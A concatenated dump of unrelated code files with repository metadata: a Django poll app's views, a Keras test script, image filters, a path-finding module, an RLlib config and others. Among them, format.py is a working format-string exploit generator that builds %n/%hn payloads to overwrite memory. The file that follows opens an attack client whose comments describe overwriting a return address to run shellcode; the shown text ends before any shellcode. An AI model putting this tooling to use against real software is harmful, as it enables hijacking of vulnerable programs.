            # A poll that is currently accepting votes is locked: its delete /
            # name / votes fields are disabled.
            ac = p.accepting_votes
            f.fields[prefix + "delete"] = forms.BooleanField(
                required=False,
                disabled=ac,
            )
            f.fields[prefix + "name"] = forms.CharField(
                initial=p.name,
                disabled=ac,
            )
            # Bug fix: this used to be initial=1, which silently reset
            # votes_per_ballot on every save; show the poll's real value.
            f.fields[prefix + "votes"] = forms.IntegerField(
                initial=p.votes_per_ballot,
            )
            self.rows.append(
                (
                    p,
                    prefix + "order",
                    prefix + "delete",
                    prefix + "name",
                    prefix + "votes",
                )
            )
        f.fields["new_polls"] = forms.CharField(widget=forms.Textarea, required=False)
        return f
    def get_context_data(self, **kwargs):
        """Expose per-poll field rows plus a re-importable text dump of polls."""
        context_data = super().get_context_data(election=self.election, **kwargs)
        form = context_data["form"]
        context_data["rows"] = [
            [form[k] for k in keys] + [p.get_admin_url()] for p, *keys in self.rows
        ]
        # Text dump in the same outline format ElectionCreateForm accepts.
        poll_export = "\n\n".join(
            "%s\n\n%s"
            % (
                poll.name,
                "\n".join("    %s" % (o.name or "(blank)") for o in poll.options()),
            )
            for poll in self.polls
        )
        context_data["poll_export"] = poll_export
        return context_data
    def form_valid(self, form):
        """Apply the submitted changes: delete, edit, reorder and add polls."""
        new_order = []
        to_delete = []
        to_save = []
        for p, k_order, k_delete, k_name, k_votes in self.rows:
            ac = p.accepting_votes
            if not ac and form.cleaned_data[k_delete]:
                to_delete.append(p)
                continue
            new_order.append((form.cleaned_data[k_order], p))
            # Bug fix: polls that are accepting votes are locked (their fields
            # were disabled above); the old code had this check inverted and
            # applied edits only to locked polls.
            if ac:
                continue
            if (
                p.votes_per_ballot != form.cleaned_data[k_votes]
                or p.name != form.cleaned_data[k_name]
            ):
                p.votes_per_ballot = form.cleaned_data[k_votes]
                p.name = form.cleaned_data[k_name]
                to_save.append(p)
        # Sort on the numeric order only: comparing Poll instances on tied
        # order numbers would raise TypeError (models define no __lt__).
        order_slugs = [
            p.slug for _, p in sorted(new_order, key=lambda entry: entry[0])
        ]
        for n in form.cleaned_data["new_polls"].splitlines():
            name = n.strip()
            if not name:
                continue
            slug = slugify(name)
            order_slugs.append(slug)
            # New polls start closed, single-vote, with no ballots issued.
            p = models.Poll(
                election=self.election,
                name=name,
                slug=slug,
            )
            p.votes_per_ballot = 1
            p.accepting_votes = False
            p.number_of_ballots = 0
            to_save.append(p)
        for o in to_delete:
            o.delete()
        for o in to_save:
            o.save()
        self.election.poll_order = order_slugs
        self.election.name = form.cleaned_data["name"]
        self.election.save()
        url = (
            reverse("election_admin", kwargs={"election": self.election.slug})
            + "?a="
            + self.election.get_admin_key()
        )
        return HttpResponseRedirect(url)
class PollDetail(FormView, SinglePollMixin):
    """Voter-facing page for one poll: shows options and accepts one ballot.

    The ballot key arrives as ``?s=``; state derived from it (ballot_index,
    already_voted, can_vote, options) is cached on ``self`` by ``get_form``.
    """
    template_name = "votee/poll_detail.html"
    def get_form(self) -> forms.Form:
        """Build one ChoiceField per allowed vote, disabled without a valid key."""
        self.poll = self.get_poll()
        key = self.request.GET.get("s")
        if key is not None:
            self.ballot_index = self.poll.validate_ballot(key)
            # If "key" was invalid, ballot_index is simply None
        else:
            self.ballot_index = None
        # key_error distinguishes "no key supplied" from "key was bad".
        self.key_error = bool(key and self.ballot_index is None)
        self.already_voted = (
            self.ballot_index is not None
            and models.UsedBallot.objects.filter(
                poll=self.poll, ballot_index=self.ballot_index
            ).exists()
        )
        self.can_vote = self.ballot_index is not None
        self.options = self.poll.options()
        f = forms.Form(**self.get_form_kwargs())
        for i in range(1, self.poll.votes_per_ballot + 1):
            # "0" is the placeholder choice; real options are keyed by id.
            choices = [("0", "---")] + [(str(o.id), str(o)) for o in self.options]
            f.fields["option%s" % i] = forms.ChoiceField(
                choices=choices, disabled=not self.can_vote
            )
        return f
    def get_context_data(self, **kwargs):
        """Add voting-window countdown and ballot state to the template context."""
        context_data = super().get_context_data(**kwargs)
        s = self.poll.settings
        voting_interval = s["voting_interval"]
        if voting_interval:
            # Seconds until the next voting window opens; once the start time
            # has passed, windows repeat every voting_interval seconds.
            next_vote = s["voting_start"] - time.time()
            if next_vote < 0:
                next_vote %= voting_interval
        else:
            next_vote = 0
        context_data.update(
            just_voted=bool(self.request.GET.get("voted")),
            options=self.options,
            ballot_index=None if self.ballot_index is None else self.ballot_index + 1,
            already_voted=self.already_voted,
            poll=self.poll,
            ac=s["accepting_votes"],
            next_vote=next_vote,
            voting_interval=voting_interval,
        )
        return context_data
    def form_valid(self, form):
        """Validate the ballot and record the chosen options.

        Re-checks everything server-side: key validity, double-voting, poll
        still open, all selects filled, and no duplicate non-blank choices.
        """
        if self.already_voted:
            form.add_error(None, "You have already voted in this poll")
            return self.form_invalid(form)
        if not self.can_vote:
            form.add_error(None, "Your voting key is not valid")
            return self.form_invalid(form)
        if not self.poll.accepting_votes:
            form.add_error(
                None, "Sorry, but the poll closed before we received your vote!"
            )
            return self.form_invalid(form)
        # can_vote above already guarantees this; the assert documents it
        # (note: stripped under python -O).
        assert self.ballot_index is not None
        options = {str(o.id): o for o in self.poll.options()}
        chosen_option_ids = [
            form.cleaned_data["option%s" % i]
            for i in range(1, self.poll.votes_per_ballot + 1)
        ]
        # Unknown ids (including the "0" placeholder) map to None here.
        chosen_options = [options.get(i) for i in chosen_option_ids]
        missing_options = any(o is None for o in chosen_options)
        if missing_options:
            form.add_error(None, "Please fill out the entire form")
            return self.form_invalid(form)
        # Blank votes may repeat; named options must be distinct.
        non_blank_options = [o for o in chosen_options if o.name != ""]
        dupes = len(non_blank_options) - len(set(non_blank_options))
        if dupes:
            form.add_error(None, "You cannot vote for the same option more than once")
            return self.form_invalid(form)
        models.use_ballot(self.poll, self.ballot_index, chosen_options)
        url = (
            reverse(
                "poll_detail",
                kwargs={"election": self.get_election().slug, "poll": self.poll.slug},
            )
            + "?voted=1"
        )
        return HttpResponseRedirect(url)
class PollAdmin(FormView, SinglePollMixin):
    """Admin page for one poll: options, blank vote, ballots, voting schedule.

    Access requires the election's admin key (``?a=``); superusers without a
    key are redirected to a URL carrying a fresh one.
    """
    template_name = "votee/poll_admin.html"
    def dispatch(self, request, *args, **kwargs):
        """Gate every request on a valid admin key before normal dispatch."""
        self.args = args
        self.kwargs = kwargs
        self.poll = self.get_poll()
        key = self.request.GET.get("a") or ""
        if not self.poll.election.validate_admin_key(key):
            if request.user.is_superuser:
                # Superusers get bounced to a URL that includes a valid key.
                base_url = reverse(
                    "poll_admin",
                    kwargs={
                        "election": self.poll.election.slug,
                        "poll": self.poll.slug,
                    },
                )
                url = base_url + "?a=" + self.poll.election.get_admin_key()
                return HttpResponseRedirect(url)
            return HttpResponseForbidden("<h1>Invalid admin key</h1>")
        return super().dispatch(request, *args, **kwargs)
    def get_form(self) -> forms.Form:
        """Build the poll settings form plus one row of fields per option.

        Side effects: caches ``self.voting_start``/``self.first_vote`` for the
        template, ``self.options`` and ``self.rows`` for later methods.
        """
        f = forms.Form(**self.get_form_kwargs())
        s = self.poll.settings
        ac = s["accepting_votes"]
        if s["voting_start"]:
            # Human-readable "(in …)" / "(… ago)" description of the start time.
            self.voting_start = timezone.make_aware(
                datetime.datetime.utcfromtimestamp(s["voting_start"]),
                timezone=timezone.utc,
            )
            next_vote = self.voting_start - timezone.now().replace(microsecond=0)
            self.first_vote = (
                "(in %s)" % next_vote
                if next_vote.total_seconds() > 0
                else "(%s ago)" % (-next_vote)
            )
        else:
            self.voting_start = ""
            self.first_vote = ""
        voting_interval = s["voting_interval"]
        self.options = self.poll.options()
        any_votes = any(bool(o.count) for o in self.options)
        f.fields["name"] = forms.CharField(
            initial=self.poll.name,
        )
        f.fields["votes"] = forms.IntegerField(
            initial=self.poll.votes_per_ballot,
        )
        f.fields["ac"] = forms.BooleanField(
            initial=ac,
            required=False,
        )
        f.fields["next_vote"] = forms.FloatField(
            required=False,
        )
        f.fields["voting_interval"] = forms.FloatField(
            initial=voting_interval or None,
            required=False,
        )
        # "blank" toggles whether the poll offers a blank (empty-name) option.
        blank_options = [o for o in self.options if not o.name]
        f.fields["blank"] = forms.BooleanField(
            initial=bool(blank_options),
            required=False,
        )
        self.rows = []
        for i, o in enumerate(self.options):
            if not o.name:
                continue
            prefix = f"o{o.id}_"
            f.fields[prefix + "order"] = forms.IntegerField(
                initial=len(self.rows) + 1,
            )
            # Options are locked once the poll is accepting votes or any
            # votes have been recorded.
            f.fields[prefix + "delete"] = forms.BooleanField(
                required=False,
                disabled=ac or any_votes,
            )
            f.fields[prefix + "name"] = forms.CharField(
                initial=o.name,
                disabled=ac or any_votes,
            )
            self.rows.append((o, prefix + "order", prefix + "delete", prefix + "name"))
        f.fields["new_options"] = forms.CharField(widget=forms.Textarea, required=False)
        f.fields["ballots"] = forms.IntegerField(
            initial=self.poll.number_of_ballots,
            min_value=0,
        )
        return f
    def get_context_data(self, **kwargs):
        """Add option rows, ballot URLs, vote counts and result links."""
        context_data = super().get_context_data(**kwargs)
        form = context_data["form"]
        rows = [[form[k] for k in keys] for o, *keys in self.rows]
        reverse_args = {"election": self.poll.election.slug, "poll": self.poll.slug}
        url = (
            reverse(
                "poll_admin",
                kwargs=reverse_args,
            )
            + "?a="
            + self.poll.election.get_admin_key()
            + "&results=1"
        )
        # One voting URL (carrying its ballot key) per issued ballot.
        ballot_url = reverse("poll_detail", kwargs=reverse_args) + "?s="
        ballots = [
            ballot_url + b
            for b in self.poll.get_ballots(0, self.poll.number_of_ballots)
        ]
        used_ballots = models.UsedBallot.objects.filter(poll=self.poll).count()
        vote_count = sum(o.count for o in self.options)
        context_data.update(
            poll=self.poll,
            rows=rows,
            options=self.options,
            vote_count=vote_count,
            used_ballots=used_ballots,
            ballots=ballots,
            show_results=bool(self.request.GET.get("results")),
            show_results_link=url,
            voting_start=self.voting_start,
            first_vote=self.first_vote,
        )
        return context_data
    def form_valid(self, form):
        """Apply the submitted poll settings and option edits."""
        new_order = []
        to_delete = []
        to_save = []
        ac = self.poll.accepting_votes
        for o in self.options:
            if o.name:
                continue
            if new_order or not form.cleaned_data["blank"]:
                # Keep 0 blanks if "blank" is not checked,
                # and keep 1 blank if "blank" is checked.
                to_delete.append(o)
                continue
            # Insert blank as the first option
            new_order.append((float("-inf"), o))
            break
        if form.cleaned_data["blank"] and not new_order:
            b = models.PollOption(poll=self.poll, name="")
            to_save.append(b)
            new_order.append((float("-inf"), b))
        for o, k_order, k_delete, k_name in self.rows:
            if not ac and form.cleaned_data[k_delete]:
                to_delete.append(o)
                continue
            new_order.append((form.cleaned_data[k_order], o))
            # Bug fix: options are locked while the poll accepts votes (their
            # fields were disabled above); the old code had this check
            # inverted, which made renames dead code.
            if ac:
                continue
            if o.name != form.cleaned_data[k_name]:
                o.name = form.cleaned_data[k_name]
                to_save.append(o)
        # Sort on the numeric order only: comparing PollOption instances on
        # tied order numbers would raise TypeError (models define no __lt__).
        order = [o for _, o in sorted(new_order, key=lambda entry: entry[0])]
        for n in form.cleaned_data["new_options"].splitlines():
            name = n.strip()
            if not name:
                continue
            o = models.PollOption(
                poll=self.poll,
                name=name,
            )
            order.append(o)
            to_save.append(o)
        for o in to_delete:
            o.delete()
        for o in to_save:
            o.save()
        self.poll.accepting_votes = form.cleaned_data["ac"]
        self.poll.option_order = [o.id for o in order]
        self.poll.votes_per_ballot = form.cleaned_data["votes"]
        self.poll.number_of_ballots = form.cleaned_data["ballots"]
        self.poll.name = form.cleaned_data["name"]
        if form.cleaned_data["next_vote"]:
            # "next_vote" is a relative offset in seconds from now.
            self.poll.voting_start = round(time.time() + form.cleaned_data["next_vote"])
        self.poll.voting_interval = form.cleaned_data["voting_interval"] or 0
        self.poll.save()
        url = (
            reverse(
                "poll_admin",
                kwargs={"election": self.poll.election.slug, "poll": self.poll.slug},
            )
            + "?a="
            + self.poll.election.get_admin_key()
        )
        return HttpResponseRedirect(url)
| [
"m@git.strova.dk"
] | m@git.strova.dk |
9587742f65d79728af75fdf6856fe7cf09ff627f | c922392e752d16bbc4cbddd7d721b9c4fed4ae49 | /hw6/test.py | 82b61dda5358c9b7fec4e309745404accb6f150b | [] | no_license | dcan07/DeepLearning | 078863c4186c39e3d168d85c0d183e93803a53ff | c289d71c73bba81b46650c89b415ae2570d98545 | refs/heads/master | 2022-12-14T16:05:44.724140 | 2020-09-21T19:02:46 | 2020-09-21T19:02:46 | 297,404,840 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,246 | py |
import numpy as np
import tensorflow as tf
from tensorflow import keras
#from tensorflow.keras import layers
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,LeakyReLU
from keras.layers import Activation, Dropout, Flatten, Dense,BatchNormalization
#from tensorflow.keras.layers import BatchNormalization
from keras import backend as K
import numpy as np
import random as python_random
print('tensorflow: %s' % tf.__version__)
import sys
# Fix all RNG seeds so the evaluation is reproducible.
np.random.seed(123)
python_random.seed(123)
tf.random.set_seed(1234)

# Command line: <test images .npy> <labels .npy> <saved keras model>
test_path = sys.argv[1]
label_path = sys.argv[2]
model_path = sys.argv[3]

# Load the evaluation data and the trained model.
images = np.load(test_path)
labels = np.load(label_path)
model = keras.models.load_model(model_path)

# Arrange the 112x112 RGB images to match the backend's channel ordering.
if K.image_data_format() == 'channels_first':
    images = images.reshape(images.shape[0], 3, 112, 112)
else:
    images = images.reshape(images.shape[0], 112, 112, 3)

# Rescale pixel values from [0, 1] to [-1, 1].
images = images * 2 - 1

# Count how many argmax predictions disagree with the ground-truth labels.
predictions = model.predict(images)
predicted_classes = predictions.argmax(axis=1)
misclassified = int((predicted_classes != labels).sum())
print('Misclassification error: ', misclassified / len(labels))
| [
"noreply@github.com"
] | dcan07.noreply@github.com |
024f9ad1d7193ca47a26fc46b141fe699fd82ba7 | 396be02dd2c7394b6c599dbdb27da51b18a58cd6 | /halfAndhalf.py | a71bb47944a2dfb2f29383c73d57dba69d622f39 | [] | no_license | jamygarcia/Girls-Who-Code | e820c5761de27414142081f05cd2966b6958d0fc | 1f62a547170edac6b6115db92f5e9a9d12811e75 | refs/heads/master | 2020-12-03T03:59:09.626211 | 2017-07-14T22:48:43 | 2017-07-14T22:48:43 | 95,800,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,212 | py | from PIL import Image
## SETUP
# Load the source image and flatten its pixels into a list; the transformed
# pixels are collected in newPixelList by the filter functions below.
myImage = Image.open("ele2.jpg")
imageData = myImage.getdata()
pixelList = list(imageData)
newPixelList =[]
length = len(pixelList)
# Index of the midpoint: pixels up to here are over-exposed, the rest inverted.
halfway = length//2
counter = 0
def negative(pixel):
    """Append the color-inverted version of *pixel* to the shared newPixelList."""
    inverted = tuple(255 - channel for channel in pixel[:3])
    newPixelList.append(inverted)
def overExpose(pixel):
    """Append a brightness-doubled copy of *pixel*, capped at 255 per channel,
    to the shared newPixelList."""
    brightened = tuple(min(2 * channel, 255) for channel in pixel[:3])
    newPixelList.append(brightened)
# The first half of the image (inclusive of the midpoint) is over-exposed,
# the remainder is color-inverted.
for index, pixel in enumerate(pixelList):
    if index <= halfway:
        overExpose(pixel)
    else:
        negative(pixel)
# Assemble the transformed pixels into a fresh image and display it.
newImage = Image.new("RGB", myImage.size)
newImage.putdata(newPixelList)
newImage.show()
| [
"noreply@github.com"
] | jamygarcia.noreply@github.com |
5644e5c0b6aa0dab0c7749c8574c9a70eebc075c | 400b0cb1f25cc2fbe80a3037c06102f40c4d2d89 | /string33.py | 575f57fac37b82880d7965f8c50047498875f63b | [] | no_license | Prithamprince/Python-programming | 4c747d306829de552e3b0c6af67cfe534a2dc2e1 | 79a0953084a01978e75d2be4db0d35ba1cf29259 | refs/heads/master | 2020-05-30T06:29:26.134906 | 2019-12-13T06:33:49 | 2019-12-13T06:33:49 | 189,580,341 | 0 | 4 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from itertools import combinations
# Read a string and report whether deleting exactly one character can leave
# a palindrome: check every length-(n-1) subsequence against its reverse.
text = input()
found = False
for candidate in combinations(text, len(text) - 1):
    if candidate == candidate[::-1]:
        print("YES")
        found = True
        break
if not found:
    print("NO")
| [
"noreply@github.com"
] | Prithamprince.noreply@github.com |
233e92200613c295e2d76d7b6c59aec7b7c64c4c | 4193699d0f9e9fd2c3c6580ea0a8b458055dda74 | /formatter/format.py | 02e143f0984d04b22b88d2401a9779ea1aeae8f3 | [] | no_license | zardus/old-shellphish-crap | b3c4efdcd404825e0903d140cc5b837848ef22a9 | b3cdac37204c86fba2422f9baf28edc234916d97 | refs/heads/master | 2020-05-18T15:57:07.989952 | 2013-03-29T23:47:19 | 2013-03-29T23:47:19 | 8,738,654 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,976 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Yan Somethingrussian <yans@yancomm.net>"
__version__ = "0.1.0"
__description__ = "An automatic format string generation library."
""" Finding the character offset:
1. Run the program
2. Provide the format string, e.g., "FORMATSTRING%n%n%n%n" as input
3. Continue/Run it (and hope that it crashes, or try again)
4. Add a breakpoint to the function it crashes on (after the function prologue)
5. Find the character offset (the pointer to the format string is on the stack,
close ot $esp; just calculate the difference)
"""
import operator
import struct
import sys
def chunk(writes, word_size=4, chunk_size=1):
    """ Splits a bunch of word-sized writes into smaller write chunks
        Note: I *think* it's little-endian specific

        Parameters:
            writes: a list of (target, value) locations (of size word_size) to overwrite
            word_size: the word size (in bytes) of the architecture (default: 4)
            chunk_size: the size (in bytes) of the desired write chunks (default: 1)

        Returns:
            a list of (address, value, chunk_size) tuples, sorted by value so
            the format string can print monotonically increasing pad lengths
    """
    byte_writes = []
    # Shift amounts for each chunk, from the most-significant chunk down to 0.
    offsets = range(8 * word_size, -1, -8 * chunk_size)[1:]
    mask_piece = int("FF" * chunk_size, 16)
    for target, value in writes:
        for offset in offsets:
            # Masking and shifting; int is necessary to prevent longs
            mask = mask_piece << offset
            masked = int((value & mask) >> offset)
            # Bug fix: floor division keeps the address an int under Python 3
            # ("/" would produce a float there); identical result on Python 2.
            byte_writes.append((target + offset // 8, masked, chunk_size))
    return sorted(byte_writes, key=operator.itemgetter(1))
def pad(byte_offset, word_size=4):
    """ Pads the format string so that the pointer area is word-aligned

        Parameters:
            byte_offset: the offset in bytes on the stack to the format string
            word_size: the word size (in bytes) of the architecture (default: 4)

        Returns:
            (padding, word_offset): the "A" padding needed to reach the next
            word boundary, and the stack offset (in words) of the first pointer
    """
    # Bug fix: floor division keeps word_offset an int under Python 3
    # ("/" would produce a float there); identical result on Python 2.
    word_offset = byte_offset // word_size
    format_string = "A" * (-byte_offset % word_size)
    # The format_string was padded, so the pointers land one word later.
    if format_string:
        word_offset += 1
    return format_string, word_offset
def format_string(writes, byte_offset, string_size, current_length, debug=False):
    """ Builds the whole format string: alignment padding, the target
        pointers, then one %x-pad + %n write per chunk.
    Parameters:
        writes: a list of (target, value, size_in_bytes) tuples to overwrite
        byte_offset: the offset in bytes on the stack to the format string
        string_size: the size of the format string to generate
        current_length: the length of the format string prefix (if there is one)
        debug: Debug mode (default: False); prints the pointers with %x
               instead of writing with %n

    NOTE(review): Python 2 only — on Python 3 struct.pack returns bytes and
    the "".join below would raise TypeError.
    """
    format_start, word_offset = pad(byte_offset)
    # Embed the raw target addresses so %N$n can dereference them.
    format_start += "".join(struct.pack("=I", t) for t, _, _ in writes)
    format_end = ""
    current_length += len(format_start)
    # printf length modifiers for 1-, 2-, 4- and 8-byte %n writes.
    modifiers = { 1: "hh", 2: "h", 4: "", 8: "ll" }
    for _, v, s in writes:
        # Characters still needed so the printed count reaches v (mod 256**s).
        next_length = (v - current_length) % (256 ** s)
        # For 4 and less characters, printing directly is more efficient
        # For 5 to 8, the general method can't be used
        # Otherwise, use general method
        if next_length < 5:
            format_end += "A" * next_length
        elif next_length < 8:
            format_end += "%{:d}hhx".format(next_length)
        else:
            format_end += "%{:d}x".format(next_length)
        current_length += next_length
        # TODO: Remove this ugly debug shit
        if not debug:
            format_end += "%{:d}${:s}n".format(word_offset, modifiers[s])
        else:
            format_end += "\n%{:d}$08x\n".format(word_offset)
        word_offset += 1
    # Pad and return the built format string
    format_string = format_start + format_end
    return format_string + "B" * (string_size - len(format_string))
def format_string_fuckyeah(writes, byte_offset, string_size, printed_count, debug=False):
    # Noisy alias for format_string() (Python 2 print statement).
    print 'FuckYeah mode: ON'
    return format_string(writes, byte_offset, string_size, printed_count, debug)
def main():
    # Demo targets/values; the chunk mix uses one 2-byte write followed by
    # the remaining 1-byte writes.
    writes = ((0x45397010, 0x01020304),\
            (0x45397014, 0x11121314))
    chunks = chunk(writes, 4, 2)[0:1] + chunk(writes, 4, 1)[2:]
    # argv[1]: stack byte offset; argv[2]: "t" enables debug mode.
    print format_string(chunks, int(sys.argv[1]), 1024, 0, debug=("t" == sys.argv[2]))
def usage():
    # Print usage on stderr and exit non-zero (Python 2 print-chevron syntax).
    print >> sys.stderr, "ze seclab's über format string !"
    print >> sys.stderr, " Usage: {} <offset> <t|f>".format(sys.argv[0])
    sys.exit(1)
# CLI entry point: requires exactly <offset> and <t|f> (t enables debug mode).
if __name__ == "__main__":
    if len(sys.argv) != 3:
        usage()
    main()
| [
"yans@yancomm.net"
] | yans@yancomm.net |
d9f3e2a32427431101d08fa9c9f5b87972831ce2 | fa5435e2e05b772327e039e3ebe64fe3958ce928 | /test2.py | 754ba3a7f52d3165dd95d2641fc533f89865ac48 | [
"MIT"
] | permissive | gtg3vv/cs3240-labdemo | 435578b6a45888f080797012a7987c8eadb52b7d | 8d49de60cdd5f9dd314da1225959bf95735e174a | refs/heads/master | 2021-06-25T11:42:09.861000 | 2017-09-11T18:16:43 | 2017-09-11T18:16:43 | 103,137,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py |
def test2(y):
return y * 2
print(test2(4)) | [
"gtg3vv@virginia.edu"
] | gtg3vv@virginia.edu |
2697bbed846b1c7444c0f17047c060e264ce690a | b6e7a72b66e240e336c193b88ee147f3c384164c | /path.py | fd1c81cbf2090f858c51cd33d7d720d193b05637 | [] | no_license | jhhuang7/Towers | 638e77a7e318713e317bae209911cfc3e5231fa0 | 525de224bae0df306aa8a866119317df6030e8c4 | refs/heads/master | 2022-04-24T06:04:43.676208 | 2020-04-26T00:55:58 | 2020-04-26T00:55:58 | 136,620,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,607 | py | """
Path-finding logic for navigating a grid with obstacles
"""
# , ,
# / \/ \
# (/ //_ \_
# .-._ \|| . \
# \ '-._ _,:__.-"/---\_ \
# ______/___ '. .--------------------'~-'--.)__( , )\ \
# `'--.___ _\ / | Here ,' \)|\ `\|
# /_.-' _\ \ _:,_ Be Dragons " || (
# .'__ _.' \'-/,`-~` |/
# '. ___.> /=,| Abandon hope all ye who enter |
# / .-'/_ ) '---------------------------------'
# )' ( /(/
# \\ "
# '=='
from queue import Queue
class Path:
    """A path from a start point to an end point.
    Used to generate shortest routes between two points.
    Attributes:
        start (tuple<int, int>): The starting point
        end (tuple<int, int>): The ending point
        deltas (dict<tuple<int, int>: set<tuple<int, int>>>): For each cell,
            the set of best (column, row) deltas to follow
    """
    def __init__(self, start, end, get_neighbours):
        """Initialize a path from a starting point to a finishing point
        Parameters:
            start (tuple<int, int>): The starting position
            end (tuple<int, int>): The end position
            get_neighbours (func<tuple<int, int>>): A function which takes a
                                                    position and returns the
                                                    neighbours
        """
        self.start = start
        self.end = end
        self.get_neighbours = get_neighbours
        self._generate()
    def _generate_distance_map(self):
        """Generate a mapping of positions to their distance from the end point
        Returns:
            dict<tuple<int, int>: int>: the position distance mapping
        """
        # Breadth-first search outwards from the end cell, so each cell's
        # distance is the minimum number of steps to reach the end.
        boundary = Queue()
        boundary.put(self.end)
        distances = {self.end: 0}
        # Generate distance map
        while not boundary.empty():
            to = boundary.get()
            for from_ in self.get_neighbours(to, from_=False):
                if from_ not in distances:
                    boundary.put(from_)
                    distances[from_] = distances[to] + 1
        return distances
    def _generate_best_neighbours(self, distances):
        """Calculate the best route based on a distance mapping
        Parameters:
            distances (dict<tuple<int, int>: int>): A map of positions to
                                                    distances from end point
        Returns:
            dict<tuple<int, int>: tuple<int, int>>: A map of the best path to follow
        """
        best_neighbours = {}
        # Calculate best neighbours
        for from_ in distances:
            neighbours_by_distance = []
            for to in self.get_neighbours(from_, from_=True):
                neighbours_by_distance.append((distances[to], to))
            neighbours_by_distance.sort(key=lambda x: x[0])
            best_distance = neighbours_by_distance[0][0]
            best_deltas = set()
            # Keep every neighbour tied for the minimum distance, stored as a
            # delta (step) rather than an absolute position.
            for distance, neighbour in neighbours_by_distance:
                if distance == best_distance:
                    delta = tuple(a - b for a, b in zip(neighbour, from_))
                    best_deltas.add(delta)
            best_neighbours[from_] = best_deltas
        # The end cell has nowhere further to go.
        del best_neighbours[self.end]
        return best_neighbours
    def _generate(self):
        """Calculate the best path to travel through the path"""
        distances = self._generate_distance_map()
        # ensure the start point can be reached from the end point
        if self.start not in distances:
            raise KeyError("Cannot reach end from start")
        self.deltas = self._generate_best_neighbours(distances)
        # overwrite bests on path
        best_path = list(self.get_best_path())
        # NOTE(review): replaces the final (end, None) entry with the end
        # position paired with the previous step's delta, re-adding the end
        # cell to self.deltas below — looks intentional but is undocumented.
        best_path[-1] = best_path[-1][0], best_path[-2][1]
        # for cell in self.deltas:
        #     self.deltas[cell] = {self.deltas[cell].pop()}
        # Pin every cell on the chosen best path to a single delta.
        for best, delta in best_path:
            self.deltas[best] = {delta}
    def get_best_path(self):
        """Yields (position, delta) pairs on best path, from start to end
        Yield:
            (position, delta) pair:
                - position (tuple<int, int>): (column, row) position of point on the path
                - delta (tuple<int, int>): change in (column, row) position to reach next point on path,
                                           else None iff delta == end
        """
        best = self.start
        for delta in self.get_best_deltas():
            yield best, delta
            best = tuple(a + b for a, b in zip(best, delta))
        yield best, None
    def get_best_deltas(self):
        """Yield the best sequence of steps to travel from start to finish
        Yields:
            tuple<int, int>: Successive (column, row) deltas to follow,
                             in order, from start to end
        """
        best = self.start
        previous = None
        while best != self.end:
            delta = self.get_best_delta(best, previous=previous)
            yield delta
            previous = delta
            best = tuple(a + b for a, b in zip(best, delta))
    def get_shortest(self):
        """Yield the best path to travel from start to finish
        Yields:
            tuple<int, int>: The best sequence of positions to reach the end
        """
        for best, delta in self.get_best_path():
            yield best
            if delta is None:
                break
    def get_best_delta(self, cell, previous=None):
        """(tuple<int, int>) Returns change in (column, row) position to reach next point on path
        Prefers continuing in the previous direction when it is among the
        best options, which keeps the path straight.
        Parameters:
            cell (tuple<int, int>): Current point on the path
            previous (tuple<int, int>): Previous point on the path
        """
        if previous and previous in self.deltas[cell]:
            return previous
        return next(iter(self.deltas[cell]))
    def get_sources(self, destination):
        """Yields the cell(s) that flow into destination
        Parameters:
            destination (tuple<int, int>): The destination cell
        """
        for source, deltas in self.deltas.items():
            for delta in deltas:
                next_ = tuple(a + b for a, b in zip(source, delta))
                if next_ == destination:
                    yield source
| [
"juhua.huang@uqconnect.edu.au"
] | juhua.huang@uqconnect.edu.au |
bfe75d02e6cd857f3e4b89d4af9a5c63c92efcb1 | 24e3418c5814ba30ecffd4ca7ad8253f1dd7d414 | /rllib/contrib/bandits/agents/lin_ts.py | e7117bd0af3dba7856304eeeb94d09ed784765ee | [
"Apache-2.0",
"MIT"
] | permissive | GoingMyWay/ray | ecd7aaec0ab888b43020e5410e9da51cc44a66dd | 4fb195a22e972a0b54359ffa58afedb35e827540 | refs/heads/master | 2021-04-13T08:56:11.414281 | 2020-05-27T04:42:23 | 2020-05-27T04:42:23 | 267,219,626 | 1 | 0 | Apache-2.0 | 2020-05-27T04:22:26 | 2020-05-27T04:22:26 | null | UTF-8 | Python | false | false | 1,011 | py | import logging
from ray.rllib.agents.trainer import with_common_config
from ray.rllib.agents.trainer_template import build_trainer
from ray.rllib.contrib.bandits.agents.policy import BanditPolicy
logger = logging.getLogger(__name__)
# yapf: disable
# __sphinx_doc_begin__
TS_CONFIG = with_common_config({
    # No remote workers by default.
    "num_workers": 0,
    "use_pytorch": True,
    # Do online learning one step at a time.
    "rollout_fragment_length": 1,
    "train_batch_size": 1,
    # Bandits cant afford to do one timestep per iteration as it is extremely
    # slow because of metrics collection overhead. This setting means that the
    # agent will be trained for 100 times in one iteration of Rllib
    "timesteps_per_iteration": 100,
    "exploration_config": {
        "type": "ray.rllib.contrib.bandits.exploration.ThompsonSampling"
    }
})
# __sphinx_doc_end__
# yapf: enable
# Linear Thompson-sampling bandit trainer built on the shared BanditPolicy.
LinTSTrainer = build_trainer(
    name="LinTS", default_config=TS_CONFIG, default_policy=BanditPolicy)
| [
"noreply@github.com"
] | GoingMyWay.noreply@github.com |
a79640d7e334ac158cb26699d645aac5f110d913 | 932b875ba779a8a45443dfc909810f7f16ab4ac3 | /atk_client_P2.py | a72369c4903b66cd7d0d297c73589246176b9c1a | [] | no_license | ryandsowers/FormatString | 66ac996c5b034266f6b228fdd483bee4c13bd712 | fcfc1adeb3dfd64fc2ca6777fc36cf421b18896b | refs/heads/master | 2020-04-06T07:40:25.760964 | 2018-11-12T21:46:11 | 2018-11-12T21:46:11 | 157,281,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,417 | py | #
# Works with Python2
#
# Modified by: Ryan Sowers
# 06/04/2018
#
# Run: python atk_client_P2.py IP Port
#
import socket
import sys
import telnetlib
import time
# --- Format-string exploit client (Python 2) ---
# Leaks a stack address from the echo service via %1$p, then builds a
# format-string payload that overwrites a saved return address in three
# 2-byte %hn writes so it points into the NOP sled + shellcode below.
# Create a TCP/IP socket
